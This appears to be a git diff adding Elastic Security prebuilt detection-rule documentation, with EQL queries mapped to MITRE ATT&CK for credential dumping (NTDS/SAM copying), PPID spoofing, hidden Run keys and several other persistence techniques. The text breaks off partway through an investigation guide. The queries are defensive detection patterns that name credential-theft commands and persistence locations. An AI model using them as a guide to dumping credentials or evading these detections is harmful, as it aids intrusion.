a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nping-process-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nping-process-activity.asciidoc new file mode 100644 index 0000000000..852c5a9603 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nping-process-activity.asciidoc @@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-nping-process-activity]] +=== Nping Process Activity + +Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://en.wikipedia.org/wiki/Nmap + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and process.name == "nping" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc new file mode 100644 index 0000000000..3022d88c0f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc @@ -0,0 +1,91 @@ +[[prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied]] +=== NTDS or SAM Database File Copied + +Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 33 + +*References*: + +* https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ +* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + ( + (process.pe.original_file_name in ("Cmd.Exe", "PowerShell.EXE", "XCOPY.EXE") and + process.args : ("copy", "xcopy", "Copy-Item", "move", "cp", "mv") + ) or + (process.pe.original_file_name : "esentutl.exe" and process.args : ("*/y*", "*/vss*", "*/d*")) + ) and + process.args : ("*\\ntds.dit", "*\\config\\SAM", "\\*\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\*", "*/system32/config/SAM*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc new file mode 100644 index 0000000000..c6a953e45b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc @@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-nullsessionpipe-registry-modification]] +=== NullSessionPipe Registry Modification + +Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ +* https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and +registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\services\\LanmanServer\\Parameters\\NullSessionPipes", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\services\\LanmanServer\\Parameters\\NullSessionPipes" +) and length(registry.data.strings) > 0 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc new file mode 100644 index 0000000000..e34bc7bf04 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc @@ -0,0 +1,78 @@ +[[prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell]] +=== Outbound Scheduled Task Activity via PowerShell + +Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan = 5s + [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : "taskschd.dll" or file.name : "taskschd.dll") and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe")] + [network where host.os.type == "windows" and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and destination.port == 135 and not destination.address in ("127.0.0.1", "::1")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc new file mode 100644 index 0000000000..2c704ee347 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-10-5-parent-process-pid-spoofing]] +=== Parent Process PID Spoofing + +Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.didierstevens.com/2017/03/20/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +/* This rule is compatible with Elastic Endpoint only */ + +sequence by host.id, user.id with maxspan=3m + + [process where host.os.type == "windows" and event.type == "start" and + process.Ext.token.integrity_level_name != "system" and + ( + process.pe.original_file_name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "eqnedt32.exe", + "fltldr.exe", "mspub.exe", "msaccess.exe", "powershell.exe", "pwsh.exe", + "cscript.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", "msbuild.exe", + "mshta.exe", "wmic.exe", "cmstp.exe", "msxsl.exe") or + + (process.executable : ("?:\\Users\\*.exe", + "?:\\ProgramData\\*.exe", + "?:\\Windows\\Temp\\*.exe", + "?:\\Windows\\Tasks\\*") and + (process.code_signature.exists == false or process.code_signature.status : "errorBadDigest")) or + + process.executable : "?:\\Windows\\Microsoft.NET\\*.exe" + ) and + + not process.executable : + ("?:\\Windows\\System32\\WerFaultSecure.exe", + "?:\\WINDOWS\\SysWOW64\\WerFaultSecure.exe", + "?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\SysWOW64\\WerFault.exe") + ] by process.pid + [process where host.os.type == "windows" and event.type == "start" and + process.parent.Ext.real.pid > 0 and + + /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */ + not (process.name : "msedge.exe" and process.parent.name : "sihost.exe") and + + not process.executable : + ("?:\\Windows\\System32\\WerFaultSecure.exe", + "?:\\WINDOWS\\SysWOW64\\WerFaultSecure.exe", + "?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\SysWOW64\\WerFault.exe") + ] by process.parent.Ext.real.pid + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ +* Sub-technique: +** Name: Parent PID Spoofing +** ID: T1134.004 +** Reference URL: https://attack.mitre.org/techniques/T1134/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ +* Sub-technique: +** Name: Parent PID Spoofing +** ID: T1134.004 +** Reference URL: https://attack.mitre.org/techniques/T1134/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc new file mode 100644 index 0000000000..62f4db6efb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc @@ -0,0 +1,109 @@ +[[prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected]] +=== Persistence via Hidden Run Key Detected + +Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit). + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/outflanknl/SharpHide +* https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +/* Registry Path ends with backslash */ +registry where host.os.type == "windows" and /* length(registry.data.strings) > 0 and */ + registry.path : ("HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "HKU\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", + "HKU\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "\\REGISTRY\\MACHINE\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc new file mode 100644 index 0000000000..530fd2c8cf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc @@ -0,0 +1,80 @@ +[[prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification]] +=== Persistence via KDE AutoStart Script or Desktop File Modification + +Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://userbase.kde.org/System_Settings/Autostart +* https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ +* https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type != "deletion" and + file.extension in ("sh", "desktop") and + file.path : + ( + "/home/*/.config/autostart/*", "/root/.config/autostart/*", + "/home/*/.kde/Autostart/*", "/root/.kde/Autostart/*", + "/home/*/.kde4/Autostart/*", "/root/.kde4/Autostart/*", + "/home/*/.kde/share/autostart/*", "/root/.kde/share/autostart/*", + "/home/*/.kde4/share/autostart/*", "/root/.kde4/share/autostart/*", + "/home/*/.local/share/autostart/*", "/root/.local/share/autostart/*", + "/home/*/.config/autostart-scripts/*", "/root/.config/autostart-scripts/*", + "/etc/xdg/autostart/*", "/usr/share/autostart/*" + ) and + not process.name in ("yum", "dpkg", "install", "dnf", "teams", "yum-cron", "dnf-automatic", "docker", "dockerd", + "rpm") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc new file mode 100644 index 0000000000..33dc3d5633 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc @@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins]] +=== Persistence via Microsoft Office AddIns + +Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + file.extension : ("wll","xll","ppa","ppam","xla","xlam") and + file.path : + ( + "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\*", + "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\AddIns\\*", + "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Office Application Startup +** ID: T1137 +** Reference URL: https://attack.mitre.org/techniques/T1137/ +* Sub-technique: +** Name: Add-ins +** ID: T1137.006 +** Reference URL: https://attack.mitre.org/techniques/T1137/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc new file mode 100644 index 0000000000..018a9b1073 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc @@ -0,0 +1,87 @@ +[[prebuilt-rule-8-10-5-persistence-via-powershell-profile]] +=== Persistence via PowerShell profile + +Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles +* https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + file.path : ("?:\\Users\\*\\Documents\\WindowsPowerShell\\*", + "?:\\Users\\*\\Documents\\PowerShell\\*", + "?:\\Windows\\System32\\WindowsPowerShell\\*") and + file.name : ("profile.ps1", "Microsoft.Powershell_profile.ps1") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: PowerShell Profile +** ID: T1546.013 +** Reference URL: https://attack.mitre.org/techniques/T1546/013/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: PowerShell Profile +** ID: T1546.013 +** Reference URL: https://attack.mitre.org/techniques/T1546/013/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc new file mode 100644 index 0000000000..49ccfdff06 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc @@ -0,0 +1,105 @@ +[[prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack]] +=== Persistence via TelemetryController Scheduled Task Hijack + +Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "CompatTelRunner.exe" and process.args : "-cv*" and + not process.name : ("conhost.exe", + "DeviceCensus.exe", + "CompatTelRunner.exe", + "DismHost.exe", + "rundll32.exe", + "powershell.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc new file mode 100644 index 0000000000..6a936ebb1e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc @@ -0,0 +1,158 @@ +[[prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack]] +=== Persistence via Update Orchestrator Service Hijack + +Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/irsl/CVE-2020-1313 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Persistence via Update Orchestrator Service Hijack + +Windows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020. + +This rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence. + +> **Note**: +> This investigation guide uses the 